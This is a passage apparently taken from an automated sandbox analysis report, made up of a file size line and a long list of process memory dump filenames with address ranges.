                                                                                                        Filesize

                                                                                                        368KB

                                                                                                      • memory/5052-266-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5052-272-0x0000000003FBD000-0x00000000040BE000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.0MB

                                                                                                      • memory/5076-330-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5160-329-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5172-322-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5196-304-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5212-305-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5240-306-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5488-311-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5512-312-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5544-353-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5612-356-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5616-345-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5628-349-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5644-364-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5644-333-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5648-355-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5664-348-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5756-354-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5816-318-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5840-342-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5912-334-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5912-369-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5952-319-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5956-366-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5972-363-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6000-343-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6012-357-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6080-347-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6084-335-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6096-359-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6100-352-0x0000000000402F68-mapping.dmp
                                                                                                      • memory/6140-338-0x0000000000000000-mapping.dmp